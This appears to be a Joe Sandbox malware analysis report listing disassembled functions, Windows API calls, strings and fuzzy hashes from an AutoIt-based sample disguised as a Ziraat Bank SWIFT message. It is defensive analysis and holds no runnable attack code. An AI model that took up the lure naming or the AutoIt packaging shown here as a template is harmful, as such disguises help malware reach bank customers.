Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID: @U=u
API String ID: 1996641542-2594219639
Opcode ID: fc8a5265b3d53e47afd3ddeef5cb440504c430058a30e5379b2081896113cd61
Instruction ID: b5142c55c9165c82d41dd5b2f698de7233a2f65fbf7dbe0800923c785d2f5494
Opcode Fuzzy Hash: fc8a5265b3d53e47afd3ddeef5cb440504c430058a30e5379b2081896113cd61
Instruction Fuzzy Hash: F9514C71900208BFDB209FA8EC49EAE7B79FF08324F214115F915AB6E1D7B59A91CF50

Function 000EDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000EDBD6
GetDriveTypeW.KERNEL32(?,0013DC54,?,\\.\,0013DC00), ref: 000EDCC3
SetErrorMode.KERNEL32(00000000,0013DC54,?,\\.\,0013DC00), ref: 000EDE29

Strings

ATAPI, xrefs: 000EDD9A
CDROM, xrefs: 000EDCF7
PhysicalDrive, xrefs: 000EDC67
USB, xrefs: 000EDDBD
1394, xrefs: 000EDDA8
RAID, xrefs: 000EDDC4
FileBackedVirtual, xrefs: 000EDDF5
Removable, xrefs: 000EDD15
Fixed, xrefs: 000EDD0B
SSA, xrefs: 000EDDAF
SCSI, xrefs: 000EDD93
SSD, xrefs: 000EDD50
MMC, xrefs: 000EDDE7
iSCSI, xrefs: 000EDDCB
Virtual, xrefs: 000EDDEE
\\.\, xrefs: 000EDC2B
ATA, xrefs: 000EDDA1
Unknown, xrefs: 000EDCE3, 000EDD8C
RAMDisk, xrefs: 000EDCED
SATA, xrefs: 000EDDD9
Network, xrefs: 000EDD01
Fibre, xrefs: 000EDDB6
SAS, xrefs: 000EDDD2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 2ee63773b6d4af275966598e729579f6160f8784380b5d65aabbbe6a634b3403
Instruction ID: d48a6c7ee599d56cd7d09321eaae2338b4abb9eb20de9d815925b4018c3cc42e
Opcode Fuzzy Hash: 2ee63773b6d4af275966598e729579f6160f8784380b5d65aabbbe6a634b3403
Instruction Fuzzy Hash: AC51743034C382EFC620EB12CC418ADB7E1FB55786B24491BF867BB292DB71D959D642

Function 0010C6E9 Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0010C788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0010C83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 0010C859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 0010CB15

Strings

@U=u, xrefs: 0010C83E, 0010C859, 0010C9D5, 0010CA08, 0010CA68, 0010CAB1, 0010CB15, 0010CB39, 0010CBED
0, xrefs: 0010C89C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0$@U=u
API String ID: 2326795674-975001249
Opcode ID: a0253e1e167d81792b2ac01bf2403ed51553c7918118f667355e1286d7502703
Instruction ID: ba531448ce082ff1e119b8b851d6012d82e1bc966eae0c0dd43455135fa6b4d7
Opcode Fuzzy Hash: a0253e1e167d81792b2ac01bf2403ed51553c7918118f667355e1286d7502703
Instruction Fuzzy Hash: 52F1CD71204301AFE7258F28C889BAABBE4FF49354F084629F5C9962E1D7B4C881DFD1

Function 000ACC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 000ACC68
__wcsnicmp.LIBCMT ref: 000ACC80
__wcsnicmp.LIBCMT ref: 000ACC98
__wcsnicmp.LIBCMT ref: 000ACCB0
__wcsnicmp.LIBCMT ref: 000ACCC8
__wcsnicmp.LIBCMT ref: 000ACCE0
__wcsnicmp.LIBCMT ref: 000ACCF8
__wcsnicmp.LIBCMT ref: 000ACD0C
__wcsnicmp.LIBCMT ref: 000ACD4D
__wcsnicmp.LIBCMT ref: 000ACD61
__wcsnicmp.LIBCMT ref: 000ACD75
__wcsnicmp.LIBCMT ref: 000ACD89

Strings

#include, xrefs: 000ACCDA
#comments-start, xrefs: 000ACCF2, 000ACD47
Cannot parse #include, xrefs: 00112FA1
#requireadmin, xrefs: 000ACC92
#OnAutoItStartRegister, xrefs: 000ACCAA
#comments-end, xrefs: 000ACD6F
#cs, xrefs: 000ACD06, 000ACD5B
#notrayicon, xrefs: 000ACC7A
Bad directive syntax error, xrefs: 00112ECB
Unterminated group of comments, xrefs: 00112FB4
#pragma compile, xrefs: 000ACC62
#ce, xrefs: 000ACD83
#include-once, xrefs: 000ACCC2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 4023b403423cd3fa6523f3e1be97ce6213f2532ec4dee713446f734240bb9921
Instruction ID: 01f90a2680e2801549db5a246c553190b072afc628bae33b5fb75e8166498c23
Opcode Fuzzy Hash: 4023b403423cd3fa6523f3e1be97ce6213f2532ec4dee713446f734240bb9921
Instruction Fuzzy Hash: 4781F931640205BBEB28ABA4EC42FFF7769AF26740F054039F905AB1C3EB71D955C6A1

Function 0010638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0013DC00), ref: 00106449

Strings

SHOWDROPDOWN, xrefs: 00106500
GETCURRENTLINE, xrefs: 00106704
SETCURRENTSELECTION, xrefs: 001065D6
HIDEDROPDOWN, xrefs: 00106520
ADDSTRING, xrefs: 00106536
ISCHECKED, xrefs: 00106659
GETLINECOUNT, xrefs: 001066E4
UNCHECK, xrefs: 001066A1
SENDCOMMANDID, xrefs: 001067CA
TABLEFT, xrefs: 001064A7
GETCURRENTCOL, xrefs: 00106724
GETCURRENTSELECTION, xrefs: 00106603
EDITPASTE, xrefs: 0010675B
TABRIGHT, xrefs: 001064BD
DELSTRING, xrefs: 00106569
FINDSTRING, xrefs: 00106596
SELECTSTRING, xrefs: 00106626
CHECK, xrefs: 0010668B
GETLINE, xrefs: 0010678B
CURRENTTAB, xrefs: 001064DD
GETSELECTED, xrefs: 001066C1
ISVISIBLE, xrefs: 00106455
ISENABLED, xrefs: 0010648C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: a4caee501934377684faef1dedd69225e64a48e0ff4964feb7733ef54afad28a
Instruction ID: 2a43be4c8cb747d7b5e9f70bcfd3a93171b1aacc77b586889aa7233ea186d5e3
Opcode Fuzzy Hash: a4caee501934377684faef1dedd69225e64a48e0ff4964feb7733ef54afad28a
Instruction Fuzzy Hash: 37C18B30204345CBCA08EF10C551AEE7BA5AF95348F014869F8966B3E3DB71ED5BCB92

Function 0010B6C4 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0010B7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0010B7C1
CharNextW.USER32(0000014E), ref: 0010B7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0010B831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0010B847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0010B858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0010B875
SetWindowTextW.USER32(?,0000014E), ref: 0010B8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0010B8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 0010B90E
_memset.LIBCMT ref: 0010B933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0010B97C
_memset.LIBCMT ref: 0010B9DB
SendMessageW.USER32 ref: 0010BA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 0010BA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 0010BB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 0010BB2C
GetMenuItemInfoW.USER32(?), ref: 0010BB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0010BBA3
DrawMenuBar.USER32(?), ref: 0010BBB2
SetWindowTextW.USER32(?,0000014E), ref: 0010BBDA

Strings

0, xrefs: 0010BB4F
@U=u, xrefs: 0010B7B0, 0010B7C1, 0010B7F6, 0010B875, 0010B8DD, 0010B90E, 0010B97C, 0010BA05, 0010BA5D, 0010BB0A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0$@U=u
API String ID: 1073566785-975001249
Opcode ID: 6167428449a09c59be9979f012b059184db2386a2d0d5b7000a16aedd990dd43
Instruction ID: c7265c1bd71fc7ed194a66d6ed13154a091590e2f49c4bf81cf01321376f28e4
Opcode Fuzzy Hash: 6167428449a09c59be9979f012b059184db2386a2d0d5b7000a16aedd990dd43
Instruction Fuzzy Hash: 17E19E75904219ABDF209FA1CCC4EEE7B78FF05714F148156F999AA2D1DBB08A81CF60

Function 0010764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0010778A
GetDesktopWindow.USER32 ref: 0010779F
GetWindowRect.USER32(00000000), ref: 001077A6
GetWindowLongW.USER32(?,000000F0), ref: 00107808
DestroyWindow.USER32(?), ref: 00107834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0010785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0010787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 001078A1
SendMessageW.USER32(?,00000421,?,?), ref: 001078B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001078C9
IsWindowVisible.USER32(?), ref: 001078E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00107904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00107918
GetWindowRect.USER32(?,?), ref: 00107930
MonitorFromPoint.USER32(?,?,00000002), ref: 00107956
GetMonitorInfoW.USER32 ref: 00107970
CopyRect.USER32(?,?), ref: 00107987
SendMessageW.USER32(?,00000412,00000000), ref: 001079F2

Strings

(, xrefs: 00107965
0, xrefs: 00107735
tooltips_class32, xrefs: 00107856

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: e1c8ebdb8aac4baf9aded11586a0d185d5a9aa48ff24fcd5213a50c4a0da17db
Instruction ID: 2b3a9f4c2635b329fec3675c9dfddbdd926dca518c245536b87c12c636832b61
Opcode Fuzzy Hash: e1c8ebdb8aac4baf9aded11586a0d185d5a9aa48ff24fcd5213a50c4a0da17db
Instruction Fuzzy Hash: F1B18E71A08301AFDB14DF64D948B6ABBE5FF88314F00891DF5999B2D1DBB0E845CB92

Function 000E6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 000E6CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 000E6D21
_wcscpy.LIBCMT ref: 000E6D4F
_wcscmp.LIBCMT ref: 000E6D5A
_wcscat.LIBCMT ref: 000E6D70
_wcsstr.LIBCMT ref: 000E6D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 000E6D97
_wcscat.LIBCMT ref: 000E6DE0
_wcscat.LIBCMT ref: 000E6DE7
_wcsncpy.LIBCMT ref: 000E6E12

Strings

StringFileInfo\, xrefs: 000E6D6A
DefaultLangCodepage, xrefs: 000E6DFA
04090000, xrefs: 000E6DCD
\VarFileInfo\Translation, xrefs: 000E6D8F
%u.%u.%u.%u, xrefs: 000E6E75

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 241a253881a622107dc425885fdfe94fbde3a59c6866bfd2e08d989227b3e51a
Instruction ID: 1e5def80671834ac0e84ddb75c74aacc891feb8e1fe3b28460a907d1f2e16267
Opcode Fuzzy Hash: 241a253881a622107dc425885fdfe94fbde3a59c6866bfd2e08d989227b3e51a
Instruction Fuzzy Hash: 2E41F072A00241FFEB10AB65EC46FFF77ACEF51750F440029F901A6283EB759A01D6A5

Function 000BA856 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000BA939
GetSystemMetrics.USER32(00000007), ref: 000BA941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000BA96C
GetSystemMetrics.USER32(00000008), ref: 000BA974
GetSystemMetrics.USER32(00000004), ref: 000BA999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000BA9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 000BA9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000BA9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000BAA0D
GetClientRect.USER32(00000000,000000FF), ref: 000BAA2B
GetStockObject.GDI32(00000011), ref: 000BAA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 000BAA52

Part of subcall function 000BB63C: GetCursorPos.USER32(000000FF), ref: 000BB64F
Part of subcall function 000BB63C: ScreenToClient.USER32(00000000,000000FF), ref: 000BB66C
Part of subcall function 000BB63C: GetAsyncKeyState.USER32(00000001), ref: 000BB691
Part of subcall function 000BB63C: GetAsyncKeyState.USER32(00000002), ref: 000BB69F

SetTimer.USER32(00000000,00000000,00000028,000BAB87), ref: 000BAA79

Strings

@U=u, xrefs: 000BAA52
AutoIt v3 GUI, xrefs: 000BA9F1

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: @U=u$AutoIt v3 GUI
API String ID: 1458621304-2077007950
Opcode ID: 63bbfa2a5ac2227c133cb3f33c204eff18984435bed63a70c907ed967e506ed1
Instruction ID: 0cb0faa4773476f05c6559b9a2beb251bc6b6c2cff0526a9c0434c915ce2d786
Opcode Fuzzy Hash: 63bbfa2a5ac2227c133cb3f33c204eff18984435bed63a70c907ed967e506ed1
Instruction Fuzzy Hash: 03B18F75A0020AEFDB14DFA8EC45BEE7BB4FB08314F154229FA15A7290DBB4D891CB51

Function 000DEA9D Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 000DEAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000DEAC2
SetWindowTextW.USER32(?,?), ref: 000DEAD9
GetDlgItem.USER32(?,000003EA), ref: 000DEAEE
SetWindowTextW.USER32(00000000,?), ref: 000DEAF4
GetDlgItem.USER32(?,000003E9), ref: 000DEB04
SetWindowTextW.USER32(00000000,?), ref: 000DEB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000DEB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000DEB45
GetWindowRect.USER32(?,?), ref: 000DEB4E
SetWindowTextW.USER32(?,?), ref: 000DEBB9
GetDesktopWindow.USER32 ref: 000DEBBF
GetWindowRect.USER32(00000000), ref: 000DEBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 000DEC12
GetClientRect.USER32(?,?), ref: 000DEC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 000DEC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000DEC6F

Strings

@U=u, xrefs: 000DEAC2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID: @U=u
API String ID: 3869813825-2594219639
Opcode ID: 5a9946cf3fcaceb51354ed68434d0aef09579b06f36b05fef9d5bd52d5f12154
Instruction ID: 66d8f5ef97ac1051397d93a8c3c6dfb11f49e4e536a5aca473f649745022759d
Opcode Fuzzy Hash: 5a9946cf3fcaceb51354ed68434d0aef09579b06f36b05fef9d5bd52d5f12154
Instruction Fuzzy Hash: 98517D70900709AFDB20AFA8DD89E6FBBF5FF04704F004929E642A66A0D774B955CB10

Function 000A2EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 000A2F7A
IsWindow.USER32(?), ref: 001122FD

Strings

ACTIVE, xrefs: 001120CC
REGEXPTITLE, xrefs: 001120F8
LAST, xrefs: 001120B6
TITLE, xrefs: 00112292
REGEXPCLASS, xrefs: 00112149
HANDLE, xrefs: 001120E2
CLASS, xrefs: 00112128
INSTANCE, xrefs: 0011223C
ALL, xrefs: 00112264

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: bcd43161f3367da4e4d57b503f06abe5a1433cc449c1ccac57c703afeadac82a
Instruction ID: 52f3ca5e228f51fc4a97a85ce786bcc2f204d28136f819c390572239a1782ced
Opcode Fuzzy Hash: bcd43161f3367da4e4d57b503f06abe5a1433cc449c1ccac57c703afeadac82a
Instruction Fuzzy Hash: E5D1A530508246EFCB18EF60C841ADEBBB1BF55344F104A3DF456675A2DB30E9AADB91

Function 00106BC9 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00106C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00106D16

Strings

SELECTINVERT, xrefs: 00106DDE
VIEWCHANGE, xrefs: 00106ECD
@U=u, xrefs: 00106D16
GETSELECTEDCOUNT, xrefs: 00106CF9
ISSELECTED, xrefs: 00106D21
SELECTALL, xrefs: 00106D75
GETITEMCOUNT, xrefs: 00106C84
GETTEXT, xrefs: 00106CBF
SELECTCLEAR, xrefs: 00106D8D
GETSUBITEMCOUNT, xrefs: 00106CA1
SELECT, xrefs: 00106DA8
DESELECT, xrefs: 00106DFC
FINDITEM, xrefs: 00106E81
GETSELECTED, xrefs: 00106E3C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-1753161424
Opcode ID: fba60727ebfe5d74b5a786c4eb8b1b2ca278fb567903b272a701324e393472be
Instruction ID: c3d70e54285419440d94bc4a1867cd4e914f929508862026325adc54a0635638
Opcode Fuzzy Hash: fba60727ebfe5d74b5a786c4eb8b1b2ca278fb567903b272a701324e393472be
Instruction Fuzzy Hash: 6DA17C30204341DFCB18EF20C951AEAB7A5BF55314F114969B8A6AB3D3DB70EC1ADB51

Function 0010E731 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0010E754
GetFileSize.KERNEL32(00000000,00000000), ref: 0010E76B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 0010E776
CloseHandle.KERNEL32(00000000), ref: 0010E783
GlobalLock.KERNEL32(00000000), ref: 0010E78C
